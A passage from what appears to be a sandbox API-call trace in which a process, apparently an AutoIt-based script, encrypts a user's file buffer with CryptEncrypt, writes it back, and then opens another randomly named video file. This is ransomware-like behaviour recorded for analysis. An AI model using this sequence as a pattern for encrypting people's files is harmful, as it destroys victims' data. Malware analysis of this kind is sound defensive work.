0x43cabf8 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0103.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0103.450] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.450] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0103.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0103.451] PeekMessageW (in: lpMsg=0x144e02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e02c) returned 0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0103.451] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0103.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0103.451] PeekMessageW (in: lpMsg=0x144e1f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1f4) returned 0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0103.451] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0103.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0103.452] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0103.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.452] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbcb7) returned 0x4539650 [0103.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cad60 [0103.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.454] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0xbcb7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0xbcc0) returned 1 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0103.454] CharLowerBuffW (in: lpsz="byte[48321]", cchLength=0xb | out: lpsz="byte[48321]") returned 0xb [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0103.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0103.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0103.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cadc0 [0103.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.499] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4539650*, pdwDataLen=0x144e088*=0xbcb7, dwBufLen=0xbcc0 | out: pbData=0x4539650*, pdwDataLen=0x144e088*=0xbcc0) returned 1 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0103.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0103.499] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.500] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xbcc0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0xbcc0, lpOverlapped=0x0) returned 1 [0103.502] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0103.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.502] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca910, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.502] CryptDestroyKey (hKey=0x41ac000) returned 1 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0103.503] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.503] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.503] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.503] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0103.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0103.503] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0103.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.504] FreeLibrary (hLibModule=0x756e0000) returned 1 [0103.504] CloseHandle (hObject=0x298) returned 1 [0103.504] CloseHandle (hObject=0x258) returned 1 [0103.506] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\c1tN0jRrSKz9_ 3.mkv", nBufferLength=0x7fff, 